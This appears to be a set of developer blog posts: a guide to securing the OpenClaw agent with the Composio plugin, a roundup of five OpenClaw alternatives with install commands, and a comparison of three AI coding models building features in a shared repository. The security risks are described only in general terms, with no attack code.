OpenClaw’s whole selling point is also the problem: it can read/write files, run shell commands, and load third party “skills.” That is basically “download random code from the internet and run it with your permissions,” except now an LLM is the one executing.

What’s actually gone wrong in the wild (already):

Malicious skills on ClawHub: researchers found hundreds to thousands of skills that were straight up malware or had critical issues, including credential theft and prompt injection patterns.
Prompt injection turning into installs: there’s been at least one high profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.
Exfiltrate API keys and tokens: When your agent has full control of the computer, and when compromised, it can easily exfiltrate the API keys and tokens to attackers.

If you’re still going to run it, do the bare minimum to not get cooked:

Don't trust skills you don't know. If you didn’t read it, don’t install it.
Prefer OAuth-hosted integrations over pasting keys locally.
Run it sandboxed (Docker) and keep it away from your real home directory.

If you want to read more on OpenClaw’s security posture, we have a nice piece on it: OpenClaw is a Security Nightmare Dressed Up as a Daydream

Setting up safe Integrations

So enough of that. Let's look into how you can make it a bit more secure.

I assume you already have OpenClaw installed and have already done the initial setup onboarding. We’ll use Composio plugin, which gives us access to 850+ SaaS apps like Gmail, Outlook, Canva, YouTube, Twitter and more without you needing to manage OAuth tokens and integrations.

Contrary to OpenClaw’s native integrations, the credentials do not stay in your system and neither a compromised Claw can access them. The credentials are securely hosted and managed by Composio.

1. Install Composio Plugin

Composio’s OpenClaw plugin connects OpenClaw to Composio’s MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer without you needing to handle auth hassles.

openclaw plugins install @composio/openclaw-plugin

2. Composio Plugin Setup

Log in at dashboard.composio.dev
Choose OpenClaw as the client.
Copy your consumer key (ck_...) from the Composio dashboard settings, then set it:

openclaw config set plugins.entries.composio.config.consumerKey "ck_your_key_here"

3. Verify the plugin loaded

openclaw plugins list
openclaw logs --follow

You're looking for something like "Composio loaded" and a "tools registered" message.

If the plugin is "loaded", it means that you can now successfully access Composio.

Here's how it works:

If a tool returns an auth error, the agent will prompt you to connect that toolkit at dashboard.composio.dev.

Here's how the configuration looks:

{
  "plugins": {
    "entries": {
      "composio": {
        "enabled": true,
        "config": {
          "consumerKey": "ck_your_key_here"
        }
      }
    }
  }
}

You can configure the following options directly from the config file:

enabled: enable or disable the plugin
consumerKey: your Composio consumer key
mcpUrl: the MCP server URL. By default, it's https://connect.composio.dev/mcp

Previously, you had to configure API keys per integration, but with Composio you don't have to care about any of that. Just make sure not to leak the consumer key that we generated.

And it's that simple. Everything works out of the box as you would use any other OpenClaw plugins!

Now, to test if it works, head over to the Control UI chat and send a message, something like:

“List the Composio tools you have available. Only print the result here”

If it asks you to connect the tools, head over to dashboard.composio.dev and connect each of the tools you require. It's as simple as clicking Connect.

All the integrations you use are OAuth hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.

Wrap Up!

OpenClaw is really useful for some people (not everyone), but it’s also risky. It can touch your files, run commands, and pull in third party skills, which can include malware, like we discussed. It’s a local agent gateway with everything: your filesystem, your shell, and whatever credentials you put into it. That power is the whole point, and it’s also the danger.

So if you’re going to use it, seriously consider OAuth-hosted safe integrations instead of pasting API keys everywhere. It’s an easy way to reduce the chance of a disaster.

And, if you're looking for some secure alternatives, find it here: Top 5 Secure OpenClaw Alternatives

That’s it for this post. Hope it helped, and I’ll see you next time. ✌️

🖐️Top 5 secure OpenClaw Alternatives you should consider 👀

Shrijal Acharya — Tue, 17 Feb 2026 12:59:41 +0000

OpenClaw is everywhere right now, and I get the hype. I’ve been seeing it all over my feed lately, and it’s clearly clicking with a lot of people. 👌

After using it for quite some time myself, it feels a bit too noisy, and not every tool works the same way for every person.

Whenever something starts trending this hard, it’s a good excuse to look around, especially if you’re after something more minimal.

And now, OpenClaw may have its 4th rename to be ClosedClaw very soon. 🤷‍♂️ You never know with OpenAI.

Why OpenClaw alternatives?

OpenClaw is super powerful, no doubt, but it comes with two big headaches, and you probably have already felt them yourself.

Security
Setup Friction
Security

When your agent can read files, run shell commands, and pull in third-party “skills,” you are basically giving it the keys to your machine. The skill marketplace has already turned into a real problem, with researchers finding hundreds of malicious skills.

If you are not auditing everything you install, it is easy to get yourself cooked.

Setup Friction

The “self-host it and wire up” path is fun if you like tinkering, but it is also where most people get stuck. You end up handling gateways, background services, tokens, and permission issues (most of the time).

And it's not that you're probably going to use all the features that come with the bloated app, just a few, for most people, so alternatives often could be a good choice.

Below are five OpenClaw alternatives that can cover the same ground, often with a smoother and more minimal experience, depending on what you’re building.

1. TrustClaw

ℹ️ Rebuilt from scratch on OpenClaw's idea with 1000+ tools, with a focus on security.

TrustClaw is for those who like the idea of OpenClaw but don't want to hand over their passwords to the agent and run it locally.

It's built by the Composio team, and the pitch is basically: you get an agent that is available 24/7, capable of taking real actions across a vast number (500+) of apps, but the risky parts like credentials and code execution are handled in a more controlled way.

What makes it different?

OAuth-only auth: You connect apps the normal way (OAuth), so you are not pasting API keys or passwords into config files.
Sandboxed execution by default: Every action runs in an isolated cloud environment that disappears when the task finishes. So you are not running “agent code” locally with your permissions.
Managed tool surface: Instead of pulling random community “skills” from a public registry, TrustClaw uses Composio’s managed integrations and tooling.
Audit trails + kill switch: It keeps a full action log, and you can revoke access with one click if you ever need to.

The last point is important because agent toolchains are a real security risk right now. These marketplaces, with just one random add-on, can trick you into running malware. This has already happened in the past. Ref: OpenClaw’s AI ‘skill’ extensions are a security nightmare

The kind of prompts it’s built for

“Handle my customer complaints and log in Notion”

It finds the right tools, fetches emails, creates drafts, and writes Notion pages (using tools such as: GMAIL_FETCH_EMAILS, GMAIL_CREATE_DRAFT, NOTION_CREATE_PAGE).
“Pull all Reddit threads mentioning [competitor] from the last 3 months, analyze sentiment...”
“Summarize all Slack messages in #product-feedback from this week...”

Why it’s comparatively better (for most of you)

Setup in seconds (vs. 30 to 60 minutes of tunnels and local setup)
Encrypted credentials managed by Composio (vs. plaintext local config)
Remote sandbox (vs. local machine execution)
Managed tool surface (vs. unvetted public skill registry)
Action logs + one-click revocation (vs. digging through config files)
and no need for Mac Mini 🤷‍♂️

Quick start

Go to TrustClaw and hit Get Started.
Connect the apps you want (OAuth flow).
Give it a task in plain language, or schedule one to run while you are offline.

Here's a demo: 👇

// Detect dark theme var iframe = document.getElementById('tweet-2022518658048888916-514'); if (document.body.className.includes('dark-theme')) { iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=2022518658048888916&theme=dark" }

It's that simple, so now you have OpenClaw that runs completely in the cloud with managed permissions and the tools you require.

2. ZeroClaw

ℹ️ Written in Rust, it runs even on $10 hardware with <5MB RAM.

ZeroClaw keeps the agent stack lean. Instead of a big local setup with lots of moving parts, you get a lightweight Rust binary that starts fast and runs comfortably on cheap hardware. If you care more about speed, stability, and low resource use, this one hits the sweet spot.

What makes it different?

Ultra lightweight: designed to keep CPU and RAM usage low.
Quick boot: fast startup, good for bots and always-on tasks.
Modular: swap models, memory, tools, and channels without rewriting everything.

Why pick it over OpenClaw?

You want something minimal and predictable.
You’re running on a small VPS / Raspberry Pi / home lab.
You don’t need a huge plugin marketplace, you need a tool that just runs.

Quick Start

git clone https://github.com/zeroclaw-labs/zeroclaw.git
cd zeroclaw
cargo build --release
cargo install --path . --force

# quick setup with openrouter
zeroclaw onboard --api-key sk-... --provider openrouter

# chat
zeroclaw agent -m "Hello, ZeroClaw!"

3. NanoClaw

ℹ️ OpenClaw's alternative that runs entirely in a container for security.

NanoClaw is basically the same thing but runs completely isolated inside a Docker container. The whole idea is simple: keep the codebase small, and put the risky stuff (bash, file access, tools) inside an isolated container so it can only touch what you explicitly mount.

That's pretty much the idea of NanoClaw.

What makes it different?

Container isolation by default: runs in Apple Container (macOS) or Docker (macOS/Linux), with filesystem isolation.
Per-chat sandboxing: each group/chat can have its own memory and its own mounted filesystem, separated from others.
Built on Anthropic’s Agents SDK: it’s basically designed to work nicely with Claude’s agent tooling and Claude Code.
WhatsApp + scheduled jobs: message it from your phone, and set recurring tasks that ping you back.

Quick start

git clone https://github.com/gavrielc/nanoclaw.git
cd nanoclaw
claude

Then run /setup. Claude Code handles everything: dependencies, authentication, container setup, and service configuration.

Here's a quick demo: 👇

4. nanobot

ℹ️ Ultra lightweight AI assistant built with Python.

Nanobot, as the name suggests, is quite small. The core agent is about ~4,000 lines of code, and the repo even publishes a live count you can verify with their script. That is the whole vibe: small enough that you can actually read it, trust it, and change it.

What makes it different?

Core size metric: ~4,000 LOC, with a “real-time” line count shown in the README (and a script to verify).
MCP support (fresh): added 2026-02-14, so it can plug into MCP tool servers without you reinventing the plumbing.
Runs where you already are: built-in “gateway” mode supports a bunch of chat surfaces like Telegram, Discord, WhatsApp, Slack, Email, and more.

Quick Start

pip install nanobot-ai

nanobot onboard
nanobot agent          # local interactive chat
nanobot gateway        # run it as a chat bot (Telegram, Discord, WhatsApp, etc)

Here's a quick architecture:

Here's a video to give you an idea of how it works: 👇

5. memU Bot

ℹ️ Built for 24/7 proactive agents designed for long-running use.

memU Bot is built for people who want an agent that keeps running and becomes more useful over time, instead of resetting to zero every time you open a new chat.

The site definitely looks like it was coded by a 12-year-old 😭, but don’t let that scare you off, because the product underneath is really good.

Under the hood, it’s tied to memU, NevaMind’s memory framework for long-running proactive agents, with a focus on reducing long-run context cost by caching insights.

What makes it different?

Always-on + proactive: it’s designed to sit in the background and capture intent (not just respond to prompts).
Memory system that scales: memU treats memory like a file system (categories, memory items, cross-links), so the agent can fetch relevant fragments instead of shoving the whole history into every request.

Quick start

It's a bit more involved than other options.

If you just want the product (memU Bot):

Go to memu.bot, enter your email, and get the download link they send you.
Install it like a normal desktop app (they provide a macOS .dmg in the tutorial flow).
Start it, connect the channel you want (Telegram, etc.), and let it run so it can build memory over time.

git clone https://github.com/NevaMind-AI/memU.git
cd memU

# Requires Python 3.13+
pip install -e .

# set your key (OpenAI is the default in their quick tests)
export OPENAI_API_KEY="your_api_key"

# quick test using in-memory storage
cd tests
python test_inmemory.py

Want persistent memory backed by Postgres + pgvector?

docker run -d \
  --name memu-postgres \
  -e POSTGRES_USER=postgres \
  -e POSTGRES_PASSWORD=postgres \
  -e POSTGRES_DB=memu \
  -p 5432:5432 \
  pgvector/pgvector:pg16

export OPENAI_API_KEY="your_api_key"
cd tests
python test_postgres.py

They also provide a small runnable "proactive loop" example if you want to see the behavior without going through tests:

cd examples/proactive
python proactive.py

There's also a Cloud version which you can try out as well.

It might be worth checking this out: 👇

If you know of any other useful OpenClaw alternative tools that I haven't mentioned in this article, please share them in the comments section below. 👇🏻

That concludes this article. Thank you so much for reading! 🫡

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

🔥 Claude Opus 4.5 vs GPT 5.2 High vs Gemini 3 Pro: Production Coding Test ✅

Shrijal Acharya — Sun, 18 Jan 2026 12:41:12 +0000

Okay, so right now the WebDev leaderboard on LMArena is basically owned by the big three: Claude Opus 4.5 from Anthropic, GPT-5.2-codex (high) from OpenAI, and finally everybody's favorite, Gemini 3 Pro from Google.

So, I grabbed these three and put them into the same existing project (over 8K stars and 50K+ LOC) and asked them to build a couple of real features like a normal dev would.

Same repo. Same prompts. Same constraints.

For each task, I took the best result out of three runs per model to keep things fair.

Then I compared what they actually did: code quality, how much hand-holding they needed, and whether the feature even worked in the end.

⚠️ NOTE: Don't take the result of this test as a hard rule. This is just a small set of real-world coding tasks that shows how each model did for me in that exact setup and gives you an overview of the difference in the top 3 models' performance in the same tasks.

TL;DR

If you want a quick take, here’s how the three models performed in our tests:

Claude Opus 4.5 was the most consistent overall. It shipped working results for both tasks, and the UI polish was the best of the three. The main downside is cost. If they find a way to achieve this performance while reducing cost, it will actually be over for most other models.

GPT-5.2-codex (high) was one of the best. But it's obviously slower due to the higher reasoning. When it hit, the code quality and structure were great, but it needed more patience than the other two in this repo.

Gemini 3 Pro was the most efficient. Both tasks worked, but the output often felt like the minimum viable version, especially on the analytics dashboard.

💡 If you want the safest pick for real “ship a feature in a big repo” work, Opus 4.5 felt the most reliable in my runs. If you care about speed and cost and you’re okay polishing UI yourself, Gemini 3 Pro is a solid bet.

Test Workflow

For the test, we will use the following CLI coding agents:

Claude Opus 4.5: Claude Code (Anthropic’s terminal-based agentic coding tool)
Gemini 3 Pro: Gemini CLI
GPT-5.2 High: Codex CLI

Here’s the repo used for the entire test: iib0011/omni-tools

We will check the models on two different tasks:

Task 1: Add a global Action Palette (Ctrl + K)

Each model is asked to create a global action menu that opens with a keyboard shortcut. This feature expands on the current search by adding actions, global state, and keyboard navigation. This task checks how well the model understands current UX patterns and avoids repetition without breaking what's already in place.

Task 2: Tool Usage Analytics + Insights Dashboard

Each model had to add real usage tracking across the app, persist it locally, and then build an analytics dashboard that shows things like the most used tools, recent activity, and basic filters.

We’ll compare code quality, token usage, cost, and time to complete the build.

💡 NOTE: I will share the source code changes for each task by each model in a .patch file. This way, you can easily view them on your local system by cloning the repository and applying the patch file using git apply <path_file_name>. This method makes sharing changes easier.

Real-world Coding Tests

Test 1: Add a global Action Palette (Ctrl + K)

The task is simple: all models start from the same base commit and then follow the same prompt to build what is asked in the prompt.

And obviously, as mentioned, I will evaluate the response from the model from the "Best of 3."

Let's start off the test with something interesting:

Here's the prompt used:

This project already has a search input on the home page that lets users find tools. I want to add an improved, global version of this idea that works as an **Action Palette**, similar to what you see in editors like VS Code.

**What to build**

* Pressing **Ctrl + K** (or Cmd + K on macOS) should open a centered action palette overlay from anywhere in the app.
* The palette should support:
  * Searching and navigating to tools (reuse existing tool metadata)
  * Executing actions, such as:

    * Toggle dark mode
    * Switch language
    * Toggle user type filter (General / Developer)
    * Navigate to Home and Bookmarks
    * Clear recently used tools

* Fully keyboard-driven experience:

  * Type to filter
  * Arrow keys to navigate
  * Enter to execute
  * Escape to close

**Notes**

* This should not replace the existing home page search. Think of it as a more powerful, global version that combines navigation and actions.
* The implementation should follow existing patterns, styling, and state management used in the codebase.

GPT-5.2-Codex (high)

GPT-5.2 handled this surprisingly well. The implementation was solid end to end, and it basically one-shotted the entire feature set, including i18n support, without needing multiple correction passes.

That said, it did take a bit longer than some other models (~20 minutes), which is expected since reasoning was explicitly set to high. You can clearly see the model spending more time thinking through architecture, naming, and edge cases rather than rushing to output code. The trade-off felt worth it here.

The token usage was noticeably higher due to the reasoning set to high, but the output code reflected that.

Here's the demo:

You can find the code it generated here: GPT-5.2 High Code

Cost: ~$0.9-1.0
Duration: ~20 minutes (API time)
Code Changes: +540 lines, minimal removals
Token Usage:
- Total: ~203k
- Input: ~140k (+ cached context)
- Output: ~64k
- Reasoning tokens: ~47k

💡 NOTE: I ran the exact same prompt with the same model using the default (medium) reasoning level. The difference was honestly massive. With reasoning set to high, the quality of the code, structure, and pretty much everything jumps by miles. It’s not even a fair comparison.

Claude Opus 4.5

Claude went all in and prepared a ton of different strategies. At the start, it did run into build issues, but it kept running the build until it was able to fix all the build and lint issues.

The entire run took me about 7 minutes 50 seconds, which is the fastest among the models for this test. The features all worked as asked, and obviously, the UI looked super nice and exactly how I expected.

Here's the demo:

You can find the code it generated here: Claude Opus 4.5 Code

To be honest, this exceeded my expectations; even the i18n texts are added and displayed in the UI just as expected. Absolute cinema!

Cost: $0.94
Duration: 7 min 50 sec (API Time)
Code Changes: +540 lines, -9 lines

Gemini 3 Pro

Gemini 3 got it working, but it's clearly not on the same level as GPT-5.2 High or Claude Opus 4.5. The UI it built is fine and totally usable, but it feels a bit barebones, and you don't get many choices in the palette compared to the other two.

One clear miss is that language switching does not show up inside the action palette at all, which makes the i18n support feel incomplete even though translations technically exist.

Here's the demo:

You can find the code it generated here: Gemini 3 Pro Code

Cost: Low (helped significantly by cache reads)
Duration: ~10 minutes 49 seconds (API Time)
Code Changes: +428 lines, -65 lines
Token Usage:
- Input: ~79k
- Cache Reads: ~536k
- Output: ~10.7k
- Savings: ~87% of input tokens served from cache

Overall, Gemini 3 lands in a very clear third place here. It works, the UI looks fine, and nothing is completely broken, but compared to the depth, completeness, and polish of GPT-5.2 High and Claude Opus 4.5, it feels behind.

Test 2: Tool Usage Analytics + Insights Dashboard

This test is a step up from the action palette.

You can find the prompt I've used here: Prompt

GPT-5.2-Codex (high)

GPT-5.2 absolutely nailed this one.

The final result turned out amazing. Tool usage tracking works exactly as expected, data persists correctly, and the dashboard feels like a real product feature. Most used tools, recent usage, filters, everything just works.

One really nice touch is that it also wired analytics-related actions into the Action Palette from Test 1.

It did take a bit longer than the first test, around 26 minutes, but again, that’s the trade-off with high reasoning. You can tell the model spent time thinking through data modeling, reuse, and avoiding duplicated logic. Totally worth it here.

Here’s the demo:

You can find the code it generated here: GPT-5.2 High Code

Cost: ~$1.1–1.2
Duration: ~26 minutes (API time)
Code Changes: Large multi-file update, cleanly structured
Token Usage:
- Total: ~236k
- Input: ~162k (+ heavy cached context)
- Output: ~75k
- Reasoning tokens: ~57k

GPT-5.2 High continues to be slow but extremely powerful, and for a task like this, that’s a very good trade.

Claude Opus 4.5

Claude Opus 4.5 did great here as well.

The final implementation works end to end, and honestly, from a pure UI and feature standpoint, it’s hard to tell the difference between this and GPT-5.2 High. The dashboard looks clean, the data makes sense, and the filters work as expected.

Here’s the demo:

You can find the code it generated here: Claude Opus 4.5 Code

Cost: $1.78
Duration: ~8 minutes (API Time)
Code Changes: +1,279 lines, -17 lines

Gemini 3 Pro

Gemini 3 Pro gets the job done, but it clearly takes a more minimal approach compared to GPT-5.2 High and Claude Opus 4.5.

That said, the overall experience feels very bare minimum. The UI is functional but plain, and the dashboard lacks the polish and depth you get from the other two models.

Also, it didn't quite add the button to view the analytics right in the action palette, similar to the other two models.

Here’s the demo:

You can find the code it generated here: Gemini 3 Pro Code

Cost: Low, with heavy cache utilization
Duration: ~5 minutes (API Time)
Code Changes: +351 lines, -3 lines
Token Usage:
- Input: ~67k
- Output: ~7.1k
- Savings: ~85%+ input tokens served from cache

Overall, Gemini 3 Pro remains efficient and reliable, but in a comparison like this, efficiency alone is not enough. 🤷‍♂️

Conclusion

At least from this test, I can conclude that the models are now pretty much able to one-shot a decent complex work, at least from what I tested.

Still, there have been times when the models mess up so badly that if I were to go ahead and fix the problems one by one, it would take me nearly the same time as building it from scratch.

If I compare the results across models, Opus 4.5 definitely takes the crown. But I still don’t think we’re anywhere close to relying on it for real, big production projects. The recent improvements are honestly insane, but the results still don’t fully back them up.

For now, I think these models are great for refactoring, planning, and helping you move faster. But if you solely rely on their generated code, the codebase just won’t hold up long term.

I don't see any of these recent models as “use it and ship it” for "production," in a project with millions of lines of code, at least not in the way people hype it up.

Let me know your thoughts in the comments.

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration